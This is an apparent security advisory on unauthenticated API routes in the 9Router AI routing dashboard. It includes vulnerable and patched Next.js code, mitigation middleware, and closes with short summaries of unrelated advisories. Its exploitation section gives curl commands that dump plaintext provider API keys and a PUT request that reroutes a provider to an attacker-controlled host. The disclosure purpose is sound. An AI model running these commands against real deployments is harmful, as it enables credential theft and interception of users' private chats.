Jul 7, 2026·5 min read·2 visits
Unauthenticated API endpoints in 9Router expose sensitive API keys, allow unauthorized configuration changes, and leak multi-turn conversation transcripts.
An access control deficiency in the 9Router dashboard allows unauthenticated remote attackers to perform full CRUD operations on integrated AI providers, extract plaintext API keys, and access complete system conversation histories.
9Router functions as an AI orchestration and routing middleware dashboard built on the Next.js framework. It acts as a central hub for forwarding user prompts to various large language model (LLM) providers like OpenAI, Anthropic, and GitHub Copilot based on availability, latency, or cost constraints.\n\nBecause 9Router is designed to manage high-value API credentials and record comprehensive chat history telemetry, securing its backend interface is critical. However, in versions prior to and including 0.4.41, multiple critical API routes exposed directly to the internet lacked any form of session validation or access control check.\n\nThis omission exposes the entire system state, allowing any remote client to interact with administrative APIs. This vulnerability is classified under CWE-306 (Missing Authentication for Critical Function), CWE-862 (Missing Authorization), and CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor).
The root cause of these access control failures lies in the design of the Next.js App Router handlers inside the 9Router dashboard codebase. In Next.js, API routes defined in files such as src/app/api/providers/route.ts are automatically compiled as publicly reachable endpoints unless developers explicitly implement intercepting logic.\n\nDuring development, no global authentication middleware was registered under middleware.ts to intercept requests targeting /api/providers or /api/usage. Consequently, these route files processed all incoming HTTP methods (GET, POST, PUT, DELETE) directly without querying session status or verifying bearer tokens.\n\nThe vulnerability in /api/usage/stats/route.ts originates from a secondary serialization failure. The query handler retrieves the raw records containing full third-party API key values to generate statistics. Instead of filtering the sensitive database outputs or masking credential fields before returning them to the caller, the route serializes the unmodified database objects directly into the JSON response structure.
To illustrate the structural differences, consider the pattern of a vulnerable Next.js Route Handler versus a secured alternative.\n\ntypescript\n// Vulnerable: src/app/api/providers/route.ts\nimport { NextResponse } from 'next/server';\nimport { prisma } from '@/lib/db';\n\n// GET handler returns all active provider configurations without credentials verification\nexport async function GET() {\n const providers = await prisma.provider.findMany();\n return NextResponse.json(providers);\n}\n\n// POST handler accepts and executes database writes from any remote client\nexport async function POST(request: Request) {\n const body = await request.json();\n const newProvider = await prisma.provider.create({ data: body });\n return NextResponse.json(newProvider, { status: 201 });\n}\n\n\ntypescript\n// Patched: Implementation utilizing robust session verification\nimport { NextResponse } from 'next/server';\nimport { prisma } from '@/lib/db';\nimport { getServerSession } from 'next-auth';\nimport { authOptions } from '@/lib/auth-options';\n\nexport async function GET() {\n const session = await getServerSession(authOptions);\n if (!session) {\n return NextResponse.json({ error: 'Unauthorized' }, { status: 401 });\n }\n\n // Ensure keys are excluded from selection to prevent leaking credentials\n const providers = await prisma.provider.findMany({\n select: {\n id: true,\n name: true,\n baseUrl: true,\n // apiKey is explicitly omitted here\n }\n });\n return NextResponse.json(providers);\n}\n\n\nThis code comparison highlights that securing the application requires both verification of session context and careful data filtering to ensure secrets do not get serialized into public payloads.
Exploiting these unauthenticated endpoints is straightforward and requires only standard command-line tools. An attacker can construct a network flow model of the vulnerability as shown below:\n\nmermaid\ngraph LR\n Attacker["Unauthenticated Attacker"] -->|1. GET /api/usage/stats| VulnerableRoute["Next.js API Routes"]\n VulnerableRoute -->|2. Raw Query| Database["Database (Prisma)"]\n Database -->|3. Unmasked Credentials| VulnerableRoute\n VulnerableRoute -->|4. Cleartext API Keys| Attacker\n\n\nInitially, the attacker audits the host's /api/providers endpoint to enumerate configured AI integrations. This request yields a JSON document with active system parameters, including resource identifiers and the layout of the deployed AI infrastructure.\n\nbash\ncurl -s https://vulnerable-instance.local/api/providers\n\n\nTo extract active credentials, the attacker queries /api/usage/stats. Because the server does not filter the returned datasets, the payload includes unmasked authorization tokens for systems like OpenAI or Anthropic.\n\nbash\ncurl -s https://vulnerable-instance.local/api/usage/stats\n\n\nFinally, an attacker can hijack the prompt routing mechanism itself by sending a PUT or POST payload to change the target API endpoint URL. By pointing a provider's database record to a malicious server, the attacker intercepts all subsequent downstream chat requests containing proprietary data or system instructions.\n\nbash\ncurl -X PUT https://vulnerable-instance.local/api/providers/target-id \\\n -H "Content-Type: application/json" \\\n -d '{"name":"hijacked-connection","apiKey":"sk-attacker-key","baseUrl":"https://attacker-intercept.com/v1"}'\n
The architectural position of 9Router amplifies the consequences of this vulnerability. An attacker obtaining full CRUD operations over providers can manipulate where user queries are routed. This enables prompt interception, where proprietary algorithms, corporate source code, or internal business queries sent to the AI are logged by an attacker-controlled endpoint.\n\nFurthermore, the leakage of plaintext keys represents an immediate financial risk. Valid API keys for services like Anthropic Claude or OpenAI GPT-4 can be used to run automated scripts or host secondary applications at the victim's expense, incurring substantial billing charges.\n\nFinally, the exposure of /api/usage/request-logs and detailed trace endpoints exposes full multi-turn conversation payloads. This compromises user confidentiality on a systemic scale, revealing sensitive internal discussions, administrative inquiries, and telemetry details.
Mitigation requires immediate code updates and credential remediation. Administrators must upgrade 9Router installations to a patched version such as 0.4.45. This version implements authentication checks on critical administrative routes.\n\nBecause credentials were leaked in plaintext, all API keys registered in the dashboard before patching must be considered compromised. Operators must immediately rotate every OpenAI, Anthropic, and secondary service credential associated with the platform to terminate active unauthorized access sessions.\n\nTo secure self-deployed instances directly, configure a Next.js middleware.ts file to block requests lacking valid session tokens. This global handler should reject calls targeting administrative routes with an HTTP 401 response before database execution occurs.\n\ntypescript\n// Example middleware.ts entry point\nimport { NextResponse } from 'next/server';\nimport type { NextRequest } from 'next/server';\n\nexport function middleware(request: NextRequest) {\n const token = request.cookies.get('next-auth.session-token') || request.headers.get('Authorization');\n if (!token && (request.nextUrl.pathname.startsWith('/api/providers') || request.nextUrl.pathname.startsWith('/api/usage'))) {\n return NextResponse.json({ error: 'Authentication Required' }, { status: 401 });\n }\n return NextResponse.next();\n}\n
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
9router decolua | <= 0.4.41 | 0.4.45 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-306, CWE-200, CWE-862 |
| Attack Vector | Network |
| CVSS Score | 10.0 |
| Impact | Total Access Control Bypass, Credential Harvest, Traffic Hijacking |
| Exploit Status | Proof of Concept available |
The application does not perform any authentication checks for critical functionality, allowing unauthorized access to restricted endpoints.
A DOM-based cross-site scripting (XSS) vulnerability exists in Craft CMS versions 4.0.0-RC1 through 4.17.15 and 5.0.0-RC1 through 5.9.22. The flaw resides within the CraftSupport widget's feedback search component, which fails to neutralize GitHub issue titles before rendering them into the administrator's control panel. An unauthenticated attacker can exploit this vulnerability by submitting a crafted issue to the public Craft CMS repository on GitHub.
CVE-2026-55793 is a DOM-based Stored Cross-Site Scripting (XSS) vulnerability affecting Craft CMS versions 5.0.0-RC1 through 5.9.22. An authenticated user with minimum Author privileges can store a malicious payload in an entry's title. When an administrator or high-privileged user performs a drag-and-drop operation under the modified entry in the structure table view, the unescaped payload is retrieved and concatenated into raw HTML, resulting in arbitrary JavaScript execution within the context of the administrative session.
Craft CMS versions 5.9.0 through 5.9.9 are vulnerable to authenticated Remote Code Execution (RCE). An attacker with control panel permissions to edit entries can inject malicious Twig templates into the client-side HTTP Referer header. During the post-save redirect sequence, the server evaluates this user-controlled header using an unsandboxed Twig rendering function, leading to arbitrary system command execution.
An authenticated SQL injection vulnerability exists in the datapoint crosstab export functionality of OpenRemote. The vulnerability is caused by insecure manual SQL string construction that concatenates user-controlled display data, specifically asset display names and attribute names, directly into raw SQL statements. These statements are processed by the PostgreSQL database engine using the crosstab function to structure dynamic CSV outputs.
An insecure redirect vulnerability in Coder allows an authenticated attacker who controls a workspace agent to perform unauthorized cross-agent file operations and achieve remote code execution in other workspaces. By exploiting default redirect-following behavior in the control-plane's HTTP client, a malicious agent can redirect legitimate requests to a victim's deterministic tailnet IP address.
CVE-2026-35341 is a high-severity vulnerability in the mkfifo utility of uutils coreutils, involving a logic-flow bypass and a TOCTOU race condition that permits unauthorized file permission degradation and privilege escalation.